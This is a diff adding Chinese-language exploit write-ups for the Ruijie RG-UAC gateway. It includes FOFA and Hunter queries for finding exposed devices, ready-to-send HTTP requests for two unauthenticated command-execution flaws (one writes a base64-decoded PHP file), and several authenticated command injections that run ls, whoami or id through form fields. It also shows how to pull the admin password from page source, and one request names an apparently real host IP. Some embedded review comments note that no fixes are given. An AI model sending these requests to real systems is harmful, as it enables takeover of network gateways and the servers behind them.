--- /dev/null +++ b/锐捷RG-UAC应用网关online_check.php前台RCE漏洞.md 
@@ -0,0 +1,90 @@ +# 锐捷RG-UAC应用网关online_check.php前台RCE漏洞 + +### 一、漏洞描述 +锐捷RG-UAC应用管理网关 online_check.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。 + +### 二、影响版本 +锐捷RG-UAC应用网关 + +### 三、资产测绘 +fofa:app="Ruijie-RG-UAC" + +特征: + +![1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115.png](./img/dW2Qo23Th4j1ct2P/1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115-117320.png) + +### 四、漏洞复现 +访问该链接出现如下页面表示可能存在漏洞 + +```java +/view/vpn/autovpn/online_check.php +``` + +![1710431715996-8076fb25-cda8-46d5-98cc-ba2f96e1c4ad.png](./img/dW2Qo23Th4j1ct2P/1710431715996-8076fb25-cda8-46d5-98cc-ba2f96e1c4ad-365591.png) + +```java +iii:0,hit:0 +``` + +通过以下poc写入文件 + +```java +GET /view/vpn/autovpn/online_check.php?peernode=%20|%20`echo%20PD9waHAgZWNobyAxMTEqMTExOyB1bmxpbmsoX19GSUxFX18pOyA/Pg==%20|%20base64%20-d%20%3E%20test.php` HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Upgrade-Insecure-Requests: 1 +``` + +![1710431853374-b1498b38-c30c-43f0-8893-fa8e7893337f.png](./img/dW2Qo23Th4j1ct2P/1710431853374-b1498b38-c30c-43f0-8893-fa8e7893337f-478863.png) + +文件写入位置 + +```java +/view/vpn/autovpn/test.php +``` + +![1710431872991-5400bcfa-93cf-4df9-9e50-f00e5c241555.png](./img/dW2Qo23Th4j1ct2P/1710431872991-5400bcfa-93cf-4df9-9e50-f00e5c241555-640890.png)通过如下poc执行命令 + +```java +GET /view/vpn/autovpn/online_check.php?peernode=%20|%20`whoami%20>%201.txt` HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/122.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Upgrade-Insecure-Requests: 1 +``` + +![1710431969941-59a7fcd6-882f-425d-85e2-d70c10e71bba.png](./img/dW2Qo23Th4j1ct2P/1710431969941-59a7fcd6-882f-425d-85e2-d70c10e71bba-586973.png) + +获取命令执行结果 + +```java +/view/vpn/autovpn/1.txt +``` + +![1710431991407-1d277e48-b876-4742-adcf-ca69ccb757d9.png](./img/dW2Qo23Th4j1ct2P/1710431991407-1d277e48-b876-4742-adcf-ca69ccb757d9-381585.png) + + + +> 更新: 2024-06-24 11:42:29 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC应用网关static_convert.php前台RCE漏洞.md b/锐捷RG-UAC应用网关static_convert.php前台RCE漏洞.md new file mode 100644 index 0000000..86e9035 --- /dev/null +++ b/锐捷RG-UAC应用网关static_convert.php前台RCE漏洞.md 
@@ -0,0 +1,47 @@ +# 锐捷RG-UAC应用网关static_convert.php前台RCE漏洞 + +### 一、漏洞描述 +锐捷RG-UAC应用管理网关static_convert.php 接口处存在命令执行漏洞,未经身份认证的攻击者可执行任意命令控制服务器权限。 + +### 二、影响版本 +锐捷RG-UAC应用网关 + +### 三、资产测绘 +fofa:app="Ruijie-RG-UAC" + +特征: + +![1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115.png](./img/Q8lxrxaSC9nu8f0u/1708679452594-4ac22429-3b10-4a58-8ee3-d7d42244c115-439134.png) + +### 四、漏洞复现 +```java +GET /view/IPV6/naborTable/static_convert.php?blocks[0]=|echo%20%27%27%20>/var/www/html/ceshi.php HTTP/1.1 +Host: +Accept: application/json, text/javascript, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![1718990706166-fc93cf5e-ef51-4a13-b3dd-ca7d657fbc41.png](./img/Q8lxrxaSC9nu8f0u/1718990706166-fc93cf5e-ef51-4a13-b3dd-ca7d657fbc41-942982.png) + +```java +GET /ceshi.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1718990752914-a4154066-0057-4a6c-9bdb-53d9f30aebf0.png](./img/Q8lxrxaSC9nu8f0u/1718990752914-a4154066-0057-4a6c-9bdb-53d9f30aebf0-266952.png) + + + + + + + + + +> 更新: 2024-06-24 11:42:29 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统detail后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统detail后台命令执行漏洞.md new file mode 100644 index 0000000..49d13b1 --- /dev/null +++ b/锐捷RG-UAC统一上网行为管理审计系统detail后台命令执行漏洞.md 
@@ -0,0 +1,47 @@ +# 锐捷RG-UAC统一上网行为管理审计系统detail后台命令执行漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ fofoa:`app="Ruijie-RG-UAC"` + +登录页 + +![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/gF4XDP2ta0uNLHZK/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-711674.png) + +# 四、漏洞复现 +使用弱口令/敏感信息泄露漏洞登录系统后台 + +![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/gF4XDP2ta0uNLHZK/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-751856.png) + +获取Cookie后使用下面poc + +```plain +POST /view/bugSolve/viewData/detail.php HTTP/1.1 +Host: +Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Length: 20 + +filename=`ls+>1.txt` +``` + +![1714988517706-aae838cd-fdf4-4f18-a789-de04ff09a1fd.png](./img/gF4XDP2ta0uNLHZK/1714988517706-aae838cd-fdf4-4f18-a789-de04ff09a1fd-777574.png) + +```plain +/view/bugSolve/viewData/1.txt +``` + +![1714988508026-11d47db5-e476-435c-97fd-a8465cb23151.png](./img/gF4XDP2ta0uNLHZK/1714988508026-11d47db5-e476-435c-97fd-a8465cb23151-830434.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统gre_add_commit后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统gre_add_commit后台命令执行漏洞.md new file mode 100644 index 0000000..6e1bc8a --- /dev/null +++ b/锐捷RG-UAC统一上网行为管理审计系统gre_add_commit后台命令执行漏洞.md 
@@ -0,0 +1,47 @@ +# 锐捷RG-UAC统一上网行为管理审计系统gre_add_commit后台命令执行漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ fofoa:`app="Ruijie-RG-UAC"` + +登录页 + +![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/SlJI9VhHutLak0Um/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-226376.png) + +# 四、漏洞复现 +使用弱口令/敏感信息泄露漏洞登录系统后台 + +![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/SlJI9VhHutLak0Um/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-123556.png) + +获取Cookie后使用下面poc + +```plain +POST /view/networkConfig/GRE/gre_add_commit.php HTTP/1.1 +Host: +Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Length: 33 + +name=`ls+>1.txt`&remote=1&local=1 +``` + +![1714989028857-fa8d17c5-2707-47a9-a848-f06cbe2e54a9.png](./img/SlJI9VhHutLak0Um/1714989028857-fa8d17c5-2707-47a9-a848-f06cbe2e54a9-498056.png) + +```plain +/view/networkConfig/GRE/1.txt +``` + +![1714989065311-f14ac78a-a58b-41ff-b610-bbd258b33d8f.png](./img/SlJI9VhHutLak0Um/1714989065311-f14ac78a-a58b-41ff-b610-bbd258b33d8f-428322.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统gre_edit后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统gre_edit后台命令执行漏洞.md new file mode 100644 index 0000000..cc6b71e --- /dev/null +++ b/锐捷RG-UAC统一上网行为管理审计系统gre_edit后台命令执行漏洞.md 
@@ -0,0 +1,47 @@ +# 锐捷RG-UAC统一上网行为管理审计系统gre_edit后台命令执行漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ fofoa:`app="Ruijie-RG-UAC"` + +登录页 + +![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/wf8C3DaCBPoqZ1fi/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-701572.png) + +# 四、漏洞复现 +使用弱口令/敏感信息泄露漏洞登录系统后台 + +![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/wf8C3DaCBPoqZ1fi/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-874417.png) + +获取Cookie后使用下面poc + +```plain +POST /view/networkConfig/GRE/gre_edit.php HTTP/1.1 +Host: +Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Length: 17 + +name=`pwd+>1.txt` +``` + +![1714985931696-3bd8e43e-817b-4b7f-b9b1-7f3664b0a1c6.png](./img/wf8C3DaCBPoqZ1fi/1714985931696-3bd8e43e-817b-4b7f-b9b1-7f3664b0a1c6-200127.png) + +```plain +/view/networkConfig/GRE/1.txt +``` + +![1714986112359-00f98557-ca7c-4184-b5be-8717fce28791.png](./img/wf8C3DaCBPoqZ1fi/1714986112359-00f98557-ca7c-4184-b5be-8717fce28791-931665.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统interface_commit后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统interface_commit后台命令执行漏洞.md new file mode 100644 index 0000000..135d095 --- /dev/null +++ b/锐捷RG-UAC统一上网行为管理审计系统interface_commit后台命令执行漏洞.md 
@@ -0,0 +1,43 @@ +# 锐捷RG-UAC统一上网行为管理审计系统interface_commit后台命令执行漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ fofoa:`app="Ruijie-RG-UAC"` + +登录页 + +![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/7GS4i25yp901yTrJ/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-355914.png) + +# 四、漏洞复现 +使用弱口令/敏感信息泄露漏洞登录系统后台 + +![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/7GS4i25yp901yTrJ/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-531206.png) + +获取Cookie后使用下面poc + +```plain +GET /view/networkConfig/physicalInterface/interface_commit.php?name=`id+>1.txt` HTTP/1.1 +Host: 183.230.22.108:4443 +Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +``` + +![1714987361587-af66e872-c696-4185-a646-d394c9950b5d.png](./img/7GS4i25yp901yTrJ/1714987361587-af66e872-c696-4185-a646-d394c9950b5d-066130.png) + +```plain +/view/networkConfig/physicalInterface/1.txt +``` + +![1714987618903-d101e763-9815-4ca3-847c-11797e46adc3.png](./img/7GS4i25yp901yTrJ/1714987618903-d101e763-9815-4ca3-847c-11797e46adc3-056117.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞.md new file mode 100644 index 0000000..de1c02e --- /dev/null +++ b/锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞.md 
@@ -0,0 +1,47 @@ +# 锐捷RG-UAC统一上网行为管理审计系统ip_addr_add_commit后台命令执行漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ fofoa:`app="Ruijie-RG-UAC"` + +登录页 + +![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/MjJVTdoURakqdq8S/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-593129.png) + +# 四、漏洞复现 +使用弱口令/敏感信息泄露漏洞登录系统后台 + +![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/MjJVTdoURakqdq8S/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-993540.png) + +获取Cookie后使用下面poc + +```plain +POST /view/networkConfig/IPConfig/ip_addr_add_commit.php HTTP/1.1 +Host: +Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Length: 49 + +text_ip_addr=`ls+>1.txt`&convert_mask=1ðname=1 +``` + +![1714986202461-e530da3e-9b79-43be-8e4c-805a91ed6016.png](./img/MjJVTdoURakqdq8S/1714986202461-e530da3e-9b79-43be-8e4c-805a91ed6016-785612.png) + +```plain +/view/networkConfig/IPConfig/1.txt +``` + +![1714986238647-4c29726d-77d6-47f4-9a8c-fc144f5ca2dd.png](./img/MjJVTdoURakqdq8S/1714986238647-4c29726d-77d6-47f4-9a8c-fc144f5ca2dd-853295.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统oldipmask后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统oldipmask后台命令执行漏洞.md new file mode 100644 index 0000000..10c3c3d --- /dev/null +++ b/锐捷RG-UAC统一上网行为管理审计系统oldipmask后台命令执行漏洞.md 
@@ -0,0 +1,47 @@ +# 锐捷RG-UAC统一上网行为管理审计系统oldipmask后台命令执行漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ fofoa:`app="Ruijie-RG-UAC"` + +登录页 + +![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/JaY0nGqm7djX0Trs/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-655255.png) + +# 四、漏洞复现 +使用弱口令/敏感信息泄露漏洞登录系统后台 + +![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/JaY0nGqm7djX0Trs/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-440417.png) + +获取Cookie后使用下面poc + +```plain +POST /view/networkConfig/RouteConfig/nmc_StaticRoute/static_route_edit_ipv6.php?action=modify HTTP/1.1 +Host: +Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Length: 68 + +text_ip_addr=0000:0000:0000::0000&oldipmask=`ls+>1.txt`&oldgateway=1 +``` + +![1714986746439-82767a50-8b67-4480-8517-a215d3ab8209.png](./img/JaY0nGqm7djX0Trs/1714986746439-82767a50-8b67-4480-8517-a215d3ab8209-727540.png) + +```plain +/view/networkConfig/RouteConfig/nmc_StaticRoute/1.txt +``` + +![1714986728793-b60dd937-d634-4e87-83e8-6c03b4b983ae.png](./img/JaY0nGqm7djX0Trs/1714986728793-b60dd937-d634-4e87-83e8-6c03b4b983ae-380319.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统static_route_edit_commit后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统static_route_edit_commit后台命令执行漏洞.md new file mode 100644 index 0000000..ff4df94 --- /dev/null +++ b/锐捷RG-UAC统一上网行为管理审计系统static_route_edit_commit后台命令执行漏洞.md 
@@ -0,0 +1,47 @@ +# 锐捷RG-UAC统一上网行为管理审计系统static_route_edit_commit后台命令执行漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ fofoa:`app="Ruijie-RG-UAC"` + +登录页 + +![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/hNTRdQmi80Q2G_y-/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-873588.png) + +# 四、漏洞复现 +使用弱口令/敏感信息泄露漏洞登录系统后台 + +![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/hNTRdQmi80Q2G_y-/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-395822.png) + +获取Cookie后使用下面poc + +```plain +POST /view/networkConfig/RouteConfig/StaticRoute/static_route_edit_commit.php HTTP/1.1 +Host: +Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Length: 38 + +oldipmask=`whoami+>2.txt`&oldgateway=1 +``` + +![1714988328133-0b51fb46-5b51-4180-aad5-e38c2e83238b.png](./img/hNTRdQmi80Q2G_y-/1714988328133-0b51fb46-5b51-4180-aad5-e38c2e83238b-920825.png) + +```plain +/view/networkConfig/RouteConfig/StaticRoute/2.txt +``` + +![1714988388622-fd76d5eb-c811-43f4-934d-5fccccc26b86.png](./img/hNTRdQmi80Q2G_y-/1714988388622-fd76d5eb-c811-43f4-934d-5fccccc26b86-222879.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统text_ip_addr后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统text_ip_addr后台命令执行漏洞.md new file mode 100644 index 0000000..cea1bec --- /dev/null +++ b/锐捷RG-UAC统一上网行为管理审计系统text_ip_addr后台命令执行漏洞.md 
@@ -0,0 +1,47 @@ +# 锐捷RG-UAC统一上网行为管理审计系统text_ip_addr后台命令执行漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ fofoa:`app="Ruijie-RG-UAC"` + +登录页 + +![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/-36EvUu87to55yNJ/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-173464.png) + +# 四、漏洞复现 +使用弱口令/敏感信息泄露漏洞登录系统后台 + +![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/-36EvUu87to55yNJ/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-614323.png) + +获取Cookie后使用下面poc + +```plain +POST /view/networkConfig/IPConfig/ip_addr_edit_commit.php HTTP/1.1 +Host: +Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Length: 48 + +text_ip_addr=`whoami+>1.txt`&newmask=1&orgname=1 +``` + +![1714987076862-fe1d19bd-7d16-41b7-bfc2-2ec74230b320.png](./img/-36EvUu87to55yNJ/1714987076862-fe1d19bd-7d16-41b7-bfc2-2ec74230b320-670307.png) + +```plain +/view/networkConfig/IPConfig/1.txt +``` + +![1714987102310-5513bac3-2709-46e8-b180-02675667a5e1.png](./img/-36EvUu87to55yNJ/1714987102310-5513bac3-2709-46e8-b180-02675667a5e1-871889.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统text_prefixlen后台命令执行漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统text_prefixlen后台命令执行漏洞.md new file mode 100644 index 0000000..f1d68ef --- /dev/null +++ b/锐捷RG-UAC统一上网行为管理审计系统text_prefixlen后台命令执行漏洞.md 
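Review bot: this is the third file in the patch describing the same weakness (a network-configuration PHP page passing a form field into a shell; here `text_ip_addr`, elsewhere `oldipmask` and `text_prefixlen`) with the identical precondition `使用弱口令/敏感信息泄露漏洞登录系统后台`, yet none of them states a root cause, a vendor advisory or a mitigation. Add a shared 五、修复建议 (upgrade reference, rotate the default or leaked credentials, restrict management-plane access) or cross-reference the files so the mitigation is written once.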
@@ -0,0 +1,47 @@ +# 锐捷RG-UAC统一上网行为管理审计系统text_prefixlen后台命令执行漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在命令执行漏洞,可以通过漏洞获取root权限 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ fofoa:`app="Ruijie-RG-UAC"` + +登录页 + +![1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c.png](./img/19dwJ1XCwS9pynNa/1711942665811-46dbe53d-d2cc-433f-ac40-7a78aa2d4c6c-002349.png) + +# 四、漏洞复现 +使用弱口令/敏感信息泄露漏洞登录系统后台 + +![1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5.png](./img/19dwJ1XCwS9pynNa/1714985896501-ee5e7557-a9fe-4b1f-9baa-a777b9f147e5-943780.png) + +获取Cookie后使用下面poc + +```plain +POST /view/networkConfig/RouteConfig/StaticRoute/static_route_add_ipv6.php HTTP/1.1 +Host: +Cookie: PHPSESSID=ae63a240e1fdfb5614107040d19120f3 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Content-Length: 75 + +text_ip_addr=0000:0000:0000::0000&text_prefixlen=`ls+>1.txt`&text_gateway=1 +``` + +![1714986473370-9947d45b-a038-4c40-bd35-887ec9be4e2c.png](./img/19dwJ1XCwS9pynNa/1714986473370-9947d45b-a038-4c40-bd35-887ec9be4e2c-905624.png) + +```plain +/view/networkConfig/RouteConfig/StaticRoute/1.txt +``` + +![1714986484395-a1332920-5e93-49c7-9edd-aee6c39718e3.png](./img/19dwJ1XCwS9pynNa/1714986484395-a1332920-5e93-49c7-9edd-aee6c39718e3-180098.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞.md new file mode 100644 index 0000000..0f06d69 --- /dev/null +++ b/锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞.md 
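Review bot: the stray space before the full stop in `可以通过漏洞获取root权限 。` (also present in the sibling RG-UAC files) and the `fofoa:` typo should be fixed. The precondition sentence `使用弱口令/敏感信息泄露漏洞登录系统后台` should link to the concrete credential-leak file this patch also adds (`锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞.md`), because the 后台 requirement is what separates this from an unauthenticated RCE in any triage.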
@@ -0,0 +1,23 @@ +# 锐捷RG-UAC统一上网行为管理审计系统信息泄漏漏洞 + +# 一、漏洞简介 +锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台 。 + +# 二、影响版本 ++ 锐捷RG-UAC统一上网行为管理审计系统 + +# 三、资产测绘 ++ hunter`app.name="Ruijie 锐捷 RG-UAC"` ++ 登录页面 + +![1694194776421-ba24eefd-0902-408f-9b39-94df05de40a6.png](./img/kHsNEDmJ-KmEi_RV/1694194776421-ba24eefd-0902-408f-9b39-94df05de40a6-091037.png) + +# 四、漏洞复现 +1. `F12`搜索`super_admin`字段,发现`admin`账户和密码 + +![1694194847217-acaed4bc-eda4-4fae-a5ad-873559bc1694.png](./img/kHsNEDmJ-KmEi_RV/1694194847217-acaed4bc-eda4-4fae-a5ad-873559bc1694-341213.png) + + + +> 更新: 2024-06-24 11:42:28 +> 原文: \ No newline at end of file diff --git a/锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞.md b/锐捷RG-UAC统一上网行为管理审计系统账号密码泄漏漏洞.md new file mode 100644 index 0000000..9b2fe6f --- /dev/null 